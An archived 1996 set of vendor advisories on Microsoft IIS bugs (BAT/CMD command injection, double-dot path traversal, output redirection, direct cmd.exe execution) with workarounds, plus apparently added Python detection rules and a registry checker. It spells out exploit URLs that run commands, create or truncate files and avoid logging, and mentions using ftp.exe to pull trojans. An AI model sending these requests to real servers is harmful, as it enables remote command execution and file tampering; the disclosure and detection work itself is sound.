Windows NT server bugs
Text File | 1997-01-21 | 19KB | 465 lines
New! If you are running Windows NT or Windows 95 you can test whether your connection to the
internet is safe, right now.
Microsoft Internet Information Server v 1.0
"BAT/CMD" Security Bug, Part I.
0. Abstract
The .bat and .cmd bug is well known in the Netscape server and is described in the WWW Security
FAQ, Q59. The implementation of this bug (an undocumented remote administration feature) in the
Microsoft IIS Web server beats all the top scores.
1. Default Configuration
Let's consider a fresh IIS Web server installation where all settings are at their defaults:
1) The CGI directory is /scripts.
2) There are no files abracadabra.bat or abracadabra.cmd in the /scripts directory.
3) The IIS Web server maps the .bat and .cmd extensions to cmd.exe. Therefore the registry key
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
has the following string:
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
2. Attack
In this case a hacker with malicious intent can send either of the following two command lines to
the server:
a) /scripts/abracadabra.bat?&dir+c:\+?&time
b) /scripts/abracadabra.cmd?&dir+c:\+?&time
and the following happens:
1) The browser asks how you want to save the document. Notepad.exe or any other viewer will do
for this "type" of application.
2) The browser starts the download session. The download window appears on the screen.
3) The hacker clicks the "cancel" button in the download window, because the "time"
command on the server never terminates.
4) Nothing is logged on the server side by the IIS Web server, because the execution process
was not successfully terminated!!! (Thanks to the "time" command.) The only way to see that
something happened is to review all your NT security logs, but they do not contain
information such as REMOTE_IP. Thus the hacker's machine remains fully anonymous.
3. Resume
1) The IIS Web server allows a hacker to execute his "batch file" by typing
/scripts/abracadabra.bat?&COMMAND1+?&COMMAND2+?&...+?&COMMANDN
In a similar situation with the Netscape server, only a single command can be executed.
2) There is no file abracadabra.bat in the /scripts directory, but the .bat extension is mapped to
C:\WINNT35\System32\cmd.exe
In a similar situation with the Netscape server, the actual .bat file must exist.
3) In case a hacker enters a command like "time" or "date" as COMMAND[N], nothing will be
logged by the IIS Web server.
In a similar situation with the Netscape server, the error log will have a record of the remote
IP and the command you are trying to execute.
4. Workaround
Disable the .BAT and .CMD file extensions for external CGI scripts in the file mapping feature of
the IIS Web server.
5. Reply from MicroSoft
We sent the description of this bug to Microsoft. Here one can see their reply and
acknowledgement.
NOTE:
We have studied Microsoft's bug "fix" and found out that the problem has not been fixed! If one
uses a slightly more complicated command string, an arbitrary command can still be effectively
executed on the server. And again, nothing will be logged by IIS. More information is
available here.
OTHER REFERENCES
"BAT/CMD" Security Bug in IIS, Part I.
"BAT/CMD" Security Bug in IIS, Part II.
"4 - BUG" Alert: MS IIS, Netscape Alert.
"4 - BUG" Report: MS IIS, Netscape Report.
Windows NT Administrator's Password Recovery Program - PasswordNT ®
Windows NT Password Cracker - ScanNT ®
[NT and Net Security Services]
1996 © MWC Inc. -- Powered by OMNA ® Digital
Microsoft Internet Information Server v 1.0
"BAT/CMD" Security Bug, Part II.
0. Abstract
The .bat and .cmd bug for Microsoft Internet Information Server is described here. Microsoft
claims to have fixed this problem. The patch is available from Microsoft's site. We have studied
this patch and found out that the problem has not been fixed! If one uses a slightly more
complicated command string, an arbitrary command can still be effectively executed on the
server. And again, nothing will be logged by IIS.
1. Default Configuration
We will consider the following settings:
1) An IIS Web server with the .bat/.cmd patch from Microsoft installed (or IIS downloaded after
March 5, 1996).
2) The CGI directory is /scripts.
3) Consider test.bat in the /scripts directory:
@echo off
echo Content-type: text/plain
echo.
echo Hello World!
4) The IIS Web server maps the .bat and .cmd extensions to cmd.exe. Therefore the registry key
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap
has the following string:
.bat or .cmd=C:\WINNT35\System32\cmd.exe /c %s %s
2. Attack
In this case a hacker with malicious intent can send this command line to the server:
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe
with the results described in detail previously.
The good news is that now the file test.bat must actually be present in the scripts
directory.
3. Resume
As long as IIS does not log information about unsuccessful hits, there are ways for hackers
to break into your entire NT box. I don't want to discuss this matter in more detail, but our
network security partners recommend avoiding the use of IIS because of an even more
severe "purple security bug," which they recently discovered in IIS.
4. Workaround
Disable the .BAT and .CMD file extensions for external CGI scripts in the file mapping feature of
the IIS Web server, or don't use .bat or .cmd files as scripts.
Microsoft Internet Information Server vv. 1.x, 2.0b
New Security Bugs Alert.
June 30, 1996
0. Abstract
MWC, Inc. has discovered a new series of bugs ("4bugs") in MS IIS in addition to
the "BAT/CMD" bug, Part I and Part II.
1. What these new bugs allow one to do.
The first bug allows a user to access any file on the same partition where your wwwroot
directory exists (assuming that IIS_user has permission to read this file). It also allows
execution of any executable file on the same partition where your scripts directory exists
(assuming that IIS_user has permission to execute this file). If the cmd.exe file can be
executed, then it also allows you to execute any command and read any file on any partition
(assuming that IIS_user has permission to read or execute this file). This bug is similar to
(but not the same as) the one discovered independently by James@superstation.net. For more
information and the ISAPI filter DLL that fixes the problem, take a look at this page.
The second and third bugs exploit the passing of unchecked arguments to cmd.exe in a
way similar to the "BAT/CMD" bug. These bugs allow you to create new or modify existing
files on any partition under the following conditions:
BAT and (or) CMD files are mapped by IIS to the cmd.exe file
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
Unfortunately, the Netscape Communications and Netscape Commerce servers have
similar bugs. Similar things can be done with the Netscape server if it uses BAT or
CMD files as CGI scripts. We did not test all Web servers available on the market,
but some of them are vulnerable too.
The fourth bug is specific to the cmd.exe program. Once accessed (for example by
exploiting the first bug), cmd.exe can be used to execute any internal command or any
command on any partition, share, etc., or it can be used to create a new "custom made" file
even if the mapping of BAT and CMD files is disabled.
2. Alert
MWC, Inc. has sent a detailed bug report to Microsoft. The people at Microsoft we talked to are
very concerned about their customers, and thus the fixes from Microsoft should be available
soon.
MWC, Inc. has sent the report to Netscape as well.
MWC, Inc. will immediately send a copy of the report to every Web server developer
company to let them test whether their Web server is vulnerable to the second and third
bugs.
MWC, Inc. will publish the detailed report about the bugs on July 3, 1996 at 10:00 pm EST
at this URL. We believe that the delay between this alert and the actual publication of the
bug report will help Webmasters reconfigure their websites before the information becomes
available to the general public.
MWC, Inc. will send the report about the bugs by e-mail to all registered users on July 3,
1996 at 10:00 pm EST. Register on-line to receive your copy of the report by e-mail.
3. Conclusions and Workaround
Regardless of the Web server you are using, create separate partitions for your
wwwroot directories and scripts directories to be on the safe side.
Disable BAT/CMD file mapping and never use BAT and (or) CMD files as CGI
scripts.
Microsoft Internet Information Server vv. 1.x, 2.0b
"4BUGs" Security Bugs REPORT.
July 3, 1996
0. Abstract
MWC, Inc. has discovered a new series of bugs in the MS IIS in addition to the
"BAT/CMD" bug Part I and Part II.
1. The 4 Bugs
[DOUBLE DOT] [TRUNCATE] [REDIRECT] [CMD.EXE]
The "DOUBLE DOT" bug allows an intruder to access any file on the same partition where your
wwwroot directory is located (assuming that IIS_user has permission to read this file). It
also allows an intruder to execute any executable file on the same partition where your
scripts directory is located (assuming that IIS_user has permission to execute this file). If
the cmd.exe file can be executed, then it also allows an intruder to execute any command and
read any file on any partition (assuming that IIS_user has permission to read or execute this
file).
The command
http://[domain_name]/..\..\..\..\[PATH]\filename
allows an intruder to download any file on the same partition where the wwwroot directory is
located.
The commands
http://[domain_name]/scripts/../../../../[PATH]/filename
or
http://[domain_name]/scripts/..\..\..\..\[PATH]\filename
allow an intruder to execute any executable file on the same partition where your scripts
are located.
Note: This bug is similar to (but not the same as) the one discovered independently by
James@superstation.net. For more information and the ISAPI filter DLL that fixes the problem,
take a look at this page.
The "TRUNCATE" bug allows an intruder to create new or truncate existing files on any
partition under the following conditions:
BAT and (or) CMD files are mapped by IIS to the cmd.exe file
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
The command
http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename.bat
will create a new file at the FULL_PATH (drive:\directory) location if the file
FULL_PATH\filename.bat does not exist. If the file exists and IIS_USER has permission to
delete this file, the file will be truncated.
The command
http://[domain_name]/scripts/abracadabra.bat>FULL_PATH\filename%0A%0Dabracadabra.bat
will create a new file at the FULL_PATH (drive:\directory) location if the file
FULL_PATH\filename does not exist. If the file exists and IIS_USER has permission to delete
this file, the file will be truncated.
Note: The file abracadabra.bat does not need to exist in the scripts directory.
The "REDIRECT" bug will redirect the output of any CGI script to a file under the following
conditions:
BAT and (or) CMD files are mapped to the cmd.exe file by IIS
IIS_USER has a right to create a file in case of a new file creation
IIS_USER has a right to delete a file in case of a file modification
The commands
http://[domain_name]/scripts/script_name<existing.bat>FULL_PATH\filename%0A%0Dabracadabra.bat
or
http://[domain_name]/scripts/script_name<existing.bat>>FULL_PATH\filename%0A%0Dabracadabra.bat
will redirect (or append) the output of the existing script_name to the filename file at the
FULL_PATH (drive:\directory) location.
Note: The Netscape Communications and Netscape Commerce servers have similar bugs. Similar
things can be done with the Netscape server when using BAT/CMD files as CGI scripts.
We did not test all Web servers available on the market, but some of them are vulnerable too.
The commands
http://[domain_name]/scripts/script.bat?>FULL_PATH\filename
or
http://[domain_name]/scripts/script.bat?>>FULL_PATH\filename
will redirect (or append) the output of the existing script_name to the filename file at the
FULL_PATH (drive:\directory) location. The bug is probably more dangerous in this case
because the Netscape server runs by default under the local system account. An intruder can
also use a "|" symbol under the Netscape server to pipe the output of an existing BAT file to
any executable on any partition.
The "CMD.EXE" bug is specific to the cmd.exe shell program. Once accessed (for example by
exploiting the Double Dot bug), cmd.exe can be used to execute any internal command or any
command on any partition; it can be used to create a new "custom made" file even if the
mapping of BAT/CMD files is disabled.
The commands:
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command
or
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename
or
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename
will execute any internal command and redirect or append the output of the command
to a file.
In particular, the command:
http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat
will create a file c:\temp\hello.bat containing the phrase "hello, World". This allows a
malicious user to create simple but dangerous files. For example, these files can be used as
scripts for the ftp.exe command. This potentially allows anybody to cause the ftp client on the
server to connect to the intruder's ftp server, download trojan horse programs, etc.
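As an added illustration (not part of the MWC report), the request shapes described above for the BAT/CMD, DOUBLE DOT, TRUNCATE/REDIRECT and CMD.EXE bugs can be turned into detection rules. Because the report notes that IIS itself logs none of these hits, the constructed sample records are assumed to come from a proxy or network sensor; the record layout and the rule names are assumptions.

```python
import re
from urllib.parse import unquote

# Detection rules for the request shapes this report describes. Each regex is
# applied to the percent-decoded request target (path plus query).
RULES = [
    # ".bat?&dir+..." (Part I) and "test.bat+%26dir+..." (Part II): an ampersand
    # in the argument of a .bat/.cmd script is a cmd.exe command separator.
    ("bat-cmd-ampersand", re.compile(r"\.(bat|cmd)[?+].*&", re.I)),
    # "../" or "..\" segments: the DOUBLE DOT bug.
    ("double-dot", re.compile(r"(^|[/\\])\.\.[/\\]")),
    # ">" / ">>" / "<" in a request: the TRUNCATE and REDIRECT bugs.
    ("shell-redirect", re.compile(r"[<>]")),
    # %0A%0D embedded in the redirect target.
    ("crlf-inject", re.compile(r"[\r\n]")),
    # cmd.exe reached through the scripts directory: the CMD.EXE bug.
    ("cmd-exe", re.compile(r"cmd\.exe", re.I)),
    # "|" piping a script's output into another executable (Netscape variant).
    ("pipe", re.compile(r"\|")),
]

def classify_request(target):
    """Return the names of all rules the decoded request target trips."""
    decoded = unquote(target)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Map each suspicious request target to its rule hits; clean ones are skipped."""
    hits = {}
    for line in lines:
        target = line.split(None, 2)[1]   # "<client> <target> <status>" (assumed layout)
        names = classify_request(target)
        if names:
            hits[target] = names
    return hits

# Constructed sample records, "<client> <request target> <status>", as a proxy
# or network sensor might record them (IIS itself logs none of these hits).
SAMPLE_RECORDS = [
    r"10.0.0.5 /samples/images/h_logo.gif 200",
    r"10.0.0.5 /scripts/abracadabra.bat?&dir+c:\+?&time -",
    r"10.0.0.5 /scripts/test.bat+%26dir+%26time+%26abracadabra.exe -",
    r"10.0.0.5 /scripts/../../../../[PATH]/filename -",
    r"10.0.0.5 /scripts/abracadabra.bat>FULL_PATH\filename%0A%0Dabracadabra.bat -",
    r"10.0.0.5 /scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename -",
]

if __name__ == "__main__":
    for target, names in scan(SAMPLE_RECORDS).items():
        print(f"{target}  ->  {', '.join(names)}")
```

The ampersand rule also fires on a legitimate .bat CGI that takes a query string, which is intended: the report's workaround is that no .bat or .cmd script should be reachable at all.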
2. Alert
MWC, Inc. has sent a detailed bug report to Microsoft. The people at Microsoft we talked to
are very concerned about their customers, and thus the patches from Microsoft should be
available soon.
MWC, Inc. has sent the report to Netscape as well.
MWC, Inc. will immediately send a copy of the report to any Web server developer company
to let them test whether their Web server is vulnerable to the bugs mentioned above.
3. Conclusions and Workaround
Regardless of the Web server you are using, create separate partitions for your
wwwroot directories and scripts directories to be on the safe side.
Disable BAT/CMD file mapping and never use BAT/CMD files as CGI scripts.
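The workaround in every part of this report is the same: remove the .bat/.cmd script mapping. As an added example (not MWC's or Microsoft's code), the following script checks an export of the ScriptMap registry key quoted in Part I for extensions handed to a shell interpreter; the REGEDIT4-style export format and the sample entries are assumptions.

```python
import re

# Constructed sample: a REGEDIT4-style export of the IIS ScriptMap key quoted in
# this report. The export format is an assumption (NT 3.51's regedt32 saves keys
# differently); the two cmd.exe entries mirror the string the report shows.
SAMPLE_REG_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap]
".bat"="C:\\WINNT35\\System32\\cmd.exe /c %s %s"
".cmd"="C:\\WINNT35\\System32\\cmd.exe /c %s %s"
".pl"="C:\\PERL\\BIN\\perl.exe %s %s"
"""

SCRIPTMAP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\ScriptMap"
# Handlers that turn a script mapping into a remote shell; none may appear in ScriptMap.
SHELL_INTERPRETERS = ("cmd.exe", "command.com")


def parse_scriptmap(reg_text):
    """Return {extension: handler command line} for the ScriptMap key in a .reg export."""
    mappings = {}
    in_key = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == SCRIPTMAP_KEY.lower()
            continue
        if not in_key:
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if m:
            # .reg files double every backslash; undo that to get the real path.
            mappings[m.group(1).lower()] = m.group(2).replace("\\\\", "\\")
    return mappings


def find_shell_mappings(mappings):
    """Extensions whose handler executable is a shell interpreter (remove these per the workaround)."""
    unsafe = {}
    for ext, cmd in mappings.items():
        exe = cmd.split(" ", 1)[0].rsplit("\\", 1)[-1].lower()
        if exe in SHELL_INTERPRETERS:
            unsafe[ext] = cmd
    return unsafe


if __name__ == "__main__":
    for ext, cmd in sorted(find_shell_mappings(parse_scriptmap(SAMPLE_REG_EXPORT)).items()):
        print(f"UNSAFE: {ext} -> {cmd}")
```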
The real danger of the discovered bugs must not be underestimated. We demonstrated by a
Simulated Intrusion Attack on a test computer at the Windows NT Magazine lab that a combination
of the bugs can completely void the security of an NT domain. Information about the SIA test
is scheduled for publication in one of the upcoming issues of Windows NT Magazine.
4. The Patch
According to the reply from Microsoft, the patch for these bugs is now available at:
http://www.microsoft.com/infoserv/iisservpack.htm